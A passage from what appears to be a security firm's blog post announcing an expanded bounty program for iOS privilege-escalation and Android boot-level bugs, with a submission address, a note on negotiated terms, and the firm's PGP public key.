  • Android support: With this blog post, we are happy to announce that we are opening up our program for Android devices too. As a starting point, we’ll only examine Android boot-level bugs.
  • Existing LPEs on iOS 13+: Until we receive bootrom submissions, on iOS we’ll focus exclusively on LPEs for A12/A13 devices.

Other TFP0 Terms & Updates

Disclosures / (non)-exclusivity / and other terms will be discussed with researchers at the time of the submission. Price for the bounty will be determined following an agreement on the terms.

Submissions

Send submissions to task_for_pwn@zecops.com. The public key is available at the bottom of this post.

It has been almost two months since we launched the program, and so far it has been a great success, as it helps our DFIR investigations globally! More updates to this program will be provided soon, as it is continuously evolving.

We would like to thank everyone who supports the #FreeTheSandbox initiative, and we hope that soon we will all be allowed to inspect the devices we purchased without the need to break into them.

If you wish to analyze suspect devices, please contact us at DFIR_inspections@zecops.com

The ZecOps TFP0 Team

Bonus

If you read all the way till here – here’s a bonus:
To receive #FreeTheSandbox stickers delivered to you, fill this form

task_for_pwn@zecops.com public key below:

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
nuIgwms=
=WWrF
-----END PGP PUBLIC KEY BLOCK-----